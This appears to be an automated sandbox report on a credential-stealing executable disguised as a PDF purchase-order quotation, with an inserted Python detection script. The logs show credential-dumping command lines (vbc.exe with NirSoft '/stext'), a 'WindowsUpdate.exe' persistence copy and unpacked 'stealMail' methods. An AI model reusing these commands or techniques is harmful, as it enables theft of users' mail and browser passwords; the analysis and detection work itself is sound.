Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function 3_2_00411196: CreateToolhelp32Snapshot, memset, Process32FirstW, OpenProcess, memset, GetModuleHandleW, GetProcAddress, QueryFullProcessImageNameW, QueryFullProcessImageNameW, CloseHandle, free, Process32NextW, CloseHandle
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe | Code function 0_2_00401489: GetModuleHandleW, GetModuleHandleW, FindResourceW, GetModuleHandleW, LoadResource, LockResource, GetModuleHandleW, SizeofResource, FreeResource, ExitProcess
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe | File created: C:\Users\user\AppData\Roaming\pid.txt
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2148
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBB95.tmp
Source: PO 2010029_pdf Quotation from Alibaba Ale.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | System information queried: HandleInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: WindowsUpdate.exe | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: WindowsUpdate.exe | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, vbc.exe, 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: WindowsUpdate.exe | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: WindowsUpdate.exe | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: WindowsUpdate.exe | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: WindowsUpdate.exe | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: PO 2010029_pdf Quotation from Alibaba Ale.exe | ReversingLabs: Detection: 36%
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe | File read: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe
Source: unknown | Process created: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe 'C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe'
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2216
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2148 -s 2244
Source: unknown | Process created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe 'C:\Users\user\AppData\Roaming\WindowsUpdate.exe'
Source: unknown | Process created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe 'C:\Users\user\AppData\Roaming\WindowsUpdate.exe'
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2216
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: PO 2010029_pdf Quotation from Alibaba Ale.exe | Static file information: File size 1074688 > 1048576
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: PO 2010029_pdf Quotation from Alibaba Ale.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: PO 2010029_pdf Quotation from Alibaba Ale.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PO 2010029_pdf Quotation from Alibaba Ale.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PO 2010029_pdf Quotation from Alibaba Ale.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PO 2010029_pdf Quotation from Alibaba Ale.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PO 2010029_pdf Quotation from Alibaba Ale.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: PO 2010029_pdf Quotation from Alibaba Ale.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: PO 2010029_pdf Quotation from Alibaba Ale.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
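The process tree above is the part of this report that is directly usable for detection: the sample starts the .NET compiler vbc.exe twice with NirSoft's /stext switch (the hollowed host writing mail and browser credentials to holdermail.txt and holderwb.txt), and the persistence copy runs as WindowsUpdate.exe out of AppData\Roaming. The following triage script is an added example by the editor, not code from the report or the sample. It runs over constructed process-creation events shaped like those lines (the parents assigned to the sample and to WindowsUpdate.exe are assumptions, since the report lists them as unknown), and the host and parent allow-lists are assumptions to be tuned against local telemetry.

```python
"""Process-creation triage for the pattern in the process tree above.

Added example by the editor, not taken from the sandbox report or from the
sample. It runs over a few constructed process-creation events (Sysmon event
ID 1 style fields: Image, CommandLine, ParentImage) and flags two things the
report shows:

  1. A .NET framework binary (vbc.exe here) started with NirSoft's
     '/stext <file>' switch by a parent that is not a build tool: the
     hollowed host dumping mail/browser credentials to a text file.
  2. A binary carrying a system-component name that runs out of a
     user-writable profile directory (AppData\\Roaming\\WindowsUpdate.exe).
"""
import re
from dataclasses import dataclass

# Hosts seen hollowed for this purpose. vbc.exe is from this report; the other
# two are assumed common alternatives and can be extended from your own telemetry.
HOLLOW_HOSTS = {"vbc.exe", "regasm.exe", "regsvcs.exe"}
# Assumed legitimate callers of vbc.exe; tune to the environment.
BUILD_PARENTS = {"msbuild.exe", "devenv.exe", "csc.exe"}
SYSTEM_LOOKALIKES = {"windowsupdate.exe", "svchost.exe", "csrss.exe", "lsass.exe"}
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\(roaming|local)\\", re.I)
STEXT = re.compile(r"(?:^|\s)/stext\s+(['\"]?)(?P<out>[^'\"]+)\1", re.I)


@dataclass
class ProcEvent:
    image: str
    command_line: str
    parent_image: str


@dataclass
class Finding:
    rule: str
    image: str
    detail: str


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return one Finding per matching rule per event, in event order."""
    findings = []
    for ev in events:
        img, parent = _basename(ev.image), _basename(ev.parent_image)
        m = STEXT.search(ev.command_line)
        if img in HOLLOW_HOSTS and m and parent not in BUILD_PARENTS:
            findings.append(Finding("nirsoft_stext_in_hollowed_host", ev.image,
                                    f"parent={parent} dump={m.group('out')}"))
        if img in SYSTEM_LOOKALIKES and USER_WRITABLE.search(ev.image):
            findings.append(Finding("system_name_in_user_profile", ev.image,
                                    f"parent={parent}"))
    return findings


SAMPLE = r"C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe"
VBC = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"

# Constructed events modelled on the process tree in this report. The parents of
# the sample and of WindowsUpdate.exe are not given in the report; explorer.exe
# and the sample itself are assumed here.
SAMPLE_EVENTS = [
    ProcEvent(SAMPLE, f"'{SAMPLE}'", r"C:\Windows\explorer.exe"),
    ProcEvent(VBC, VBC + r" /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'", SAMPLE),
    ProcEvent(VBC, VBC + r" /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'", SAMPLE),
    ProcEvent(r"C:\Users\user\AppData\Roaming\WindowsUpdate.exe",
              r"'C:\Users\user\AppData\Roaming\WindowsUpdate.exe'", SAMPLE),
    # Benign control: vbc.exe invoked by MSBuild compiling a project; must not fire.
    ProcEvent(VBC, VBC + r" /noconfig @C:\build\obj\Debug\app.rsp",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.rule:32} {f.image}  ({f.detail})")
```

The /stext check keys on the switch rather than on the dump file name, because the file names (holdermail.txt, holderwb.txt) are a per-build choice while the switch belongs to the embedded NirSoft tools and does not change; the parent allow-list is what keeps a developer workstation from firing on every real vbc.exe compile.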
              Source: Binary string: rsaenh.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: 1:pC:\Windows\mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321080904.0000000021E7A000.00000004.00000010.sdmp
              Source: Binary string: wkernel32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: bcrypt.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: ws2_32.pdb0up source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: ucrtbase.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: System.Configuration.pdbKt0 source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wbemcomn.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: NapiNSP.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: msvcrt.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wrpcrt4.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wntdll.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321080904.0000000021E7A000.00000004.00000010.sdmp
              Source: Binary string: f:\binaries.x86ret\bin\i386\bbt\opt\bin\i386\diasymreader.pdb:p source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: powrprof.pdbBuP source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscoreei.pdbOs source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: winnsi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscms.pdbQn source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: cryptsp.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: C:\Windows\mscorlib.pdbd source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
              Source: Binary string: advapi32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wsspicli.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: msi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: CLBCatQ.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: ntmarta.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: dhcpcsvc.pdbFp@ source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wwin32u.pdbup source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: cryptsp.pdb`t0 source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wkernelbase.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: psapi.pdb7u` source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: shlwapi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: version.pdbht source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: WindowsUpdate.exe
              Source: Binary string: mscorjit.pdbbt source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: ODBC32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: WindowsUpdate.exe
              Source: Binary string: dwmapi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscoree.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: Windows.Storage.pdbcw source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: ws2_32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscorlib.pdbDr source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: msasn1.pdb8u source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: f:\binaries.x86ret\bin\i386\bbt\opt\bin\i386\diasymreader.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: iphlpapi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: nsi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscorlib.pdb6 source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
              Source: Binary string: rasman.pdb2o source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: powrprof.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: System.Configuration.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: ole32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: rlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
              Source: Binary string: msasn1.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321080904.0000000021E7A000.00000004.00000010.sdmp, WERD288.tmp.mdmp.6.dr
              Source: Binary string: DWrite.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: cfgmgr32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: System.Drawing.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: System.Management.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: combase.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: Windows.Storage.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: dhcpcsvc6.pdb]s0 source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
              Source: Binary string: dpapi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: apphelp.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: rasadhlp.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
              Source: Binary string: dhcpcsvc.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: dwmapi.pdbHt0 source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: pnrpnsp.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: cryptbase.pdbjt source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: ColorAdapterClient.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wsspicli.pdbkt source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: shcore.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: C:\Windows\dll\mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
              Source: Binary string: wgdi32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: fltLib.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: shell32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: msvcr80.i386.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: msvcp_win.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: dpapi.pdbxs source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: shfolder.pdbit`F source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: dnsapi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: rasapi32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: System.Runtime.Remoting.pdb*p source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: userenv.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wimm32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wwin32u.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: nlaapi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: userenv.pdbqs source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: winnsi.pdbds source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: winhttp.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wUxTheme.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: DDsymbols\dll\mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321080904.0000000021E7A000.00000004.00000010.sdmp
              Source: Binary string: wmiutils.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: gdiplus.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscorlib.pdbH source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321080904.0000000021E7A000.00000004.00000010.sdmp
              Source: Binary string: rtutils.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscorwks.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: profapi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: dhcpcsvc6.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: Kernel.Appcore.pdbGu source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: f:\binaries.x86ret\bin\i386\Microsoft.VisualBasic.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wgdi32full.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscorjit.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: sechost.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: winhttp.pdb p source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscoree.pdbWsP source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: shfolder.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wgdi32full.pdbmt@ source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: rasman.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: fastprox.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wbemsvc.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: winrnr.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: System.Drawing.pdb@ source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: msctf.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: WindowsUpdate.exe
              Source: Binary string: System.Runtime.Remoting.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wmswsock.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: version.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: rsaenh.pdb]t source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: System.Xml.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: System.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscms.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscorrc.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.304520747.000000001B140000.00000002.00000001.sdmp
              Source: Binary string: System.Windows.Forms.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: Kernel.Appcore.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: WMINet_Utils.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: psapi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: fwpuclnt.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: bcrypt.pdb[t source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: cryptbase.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wuser32.pdb@w source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: bcryptprimitives.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscoreei.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: nlaapi.pdb5o0 source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321080904.0000000021E7A000.00000004.00000010.sdmp
              Source: Binary string: msvcp_win.pdb[w source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: oleaut32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wuser32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wbemprox.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
              Source: Binary string: crypt32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation:

              .NET source code contains potential unpacker
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 2_2_00404837 GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,#17,MessageBoxA,2_2_00404837
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe Code function: 0_2_00401F16 push ecx; ret 0_2_00401F29
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe Code function: 0_2_00AD1BF6 push ecx; ret 0_2_00AD1C09
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 2_2_00411879 push ecx; ret 2_2_00411889
